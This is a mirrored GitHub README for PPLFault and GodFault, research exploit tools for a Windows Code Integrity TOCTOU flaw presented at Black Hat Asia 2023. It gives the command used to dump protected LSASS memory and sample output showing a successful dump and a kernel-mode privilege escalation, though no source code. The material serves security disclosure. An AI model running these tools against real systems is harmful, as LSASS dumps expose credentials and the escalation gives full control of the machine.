Code Monkey home page Code Monkey logo

pplfault's Introduction

PPLFault

By Gabriel Landau at Elastic Security.

From PPLdump Is Dead. Long Live PPLdump! presented at Black Hat Asia 2023.

PPLFault

Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process. For more details on the exploit, see my slides and/or talk.

Example Output

PS C:\Users\user\Desktop> cmd /c ver

Microsoft Windows [Version 10.0.25346.1001]
PS C:\Users\user\Desktop> tasklist | findstr lsass
lsass.exe                      992 Services                   0     76,620 K
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection

Type           Signer
----           ------
ProtectedLight Lsa


PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp
 [+] No cleanup necessary.  Backup does not exist.
 [+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak
 [+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
 [+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] FetchDataCallback called.
 [+] Hydrating 90112 bytes at offset 0
 [+] Switching to payload
 [+] Emptying system working set
 [+] Working set purged
 [+] Give the memory manager a moment to think
 [+] Hydrating 90112 PAYLOAD bytes at offset 0
 [+] Dump saved to: lsass.dmp
 [+] Dump is 74.9 MB
 [+] Operation took 937 ms
PS C:\Users\user\Desktop> dir *.dmp


    Directory: C:\Users\user\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/1/2023  11:18 AM       78581973 lsass.dmp

GodFault

Exploits the same TOCTOU as PPLFault. However instead of dumping a process, it migrates to CSRSS and exploits a vulnerability in win32k!NtUserHardErrorControlCall from ANGRYORCHARD to decrement KTHREAD.PreviousMode from UserMode (1) to KernelMode (0). It proves "God Mode" access by opening \Device\PhysicalMemory, normally inaccessible from UserMode, as SECTION_ALL_ACCESS.

Example Output

C:\Users\user\Desktop>GodFault.exe -v
 [?] Server does not appear to be running.  Attempting to install it...
 [+] No cleanup necessary.  Backup does not exist.
 [+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint
 [+] CSRSS PID is 772
 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak
 [+] Payload: C:\GodFaultTemp\GodFaultPayload.dll
 [+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll
 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
 [+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] FetchDataCallback called.
 [+] Hydrating 90112 bytes at offset 0
 [+] Switching to payload
 [+] Emptying system working set
 [+] Working set purged
 [+] Give the memory manager a moment to think
 [+] Hydrating 90112 PAYLOAD bytes at offset 0
 [+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed
 [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
 [+] Opened \Device\PhysicalMemory.  Handle is 0x1b4
 [+] Opened System process as PROCESS_ALL_ACCESS.  Handle is 0x1c0
 [+] Press any key to continue...
 [+] No cleanup necessary.  Backup does not exist.

Python

PoC that achieves arbitrary code execution as WinTcb-Light without the CloudFilter API. See python/README.md.

Tested Platforms

Windows 11 22H2 22621.1702 (May 2023) Windows 11 Insider Canary 25346.1001 (April 2023)
PPLFault ✔️ ✔️
GodFault ✔️ ❌ Insider PreviousMode mitigation bugchecks

License

Silhouette is covered by the ELv2 license. It uses phnt from SystemInformer under the MIT license.

Credits

Inspired by PPLdump by Clément Labro, which Microsoft patched in July 2022.

ANGRYORCHARD was created by Austin Hudson, who released it when Microsoft patched PPLdump.

pplfault's People

Contributors

gabriellandau avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.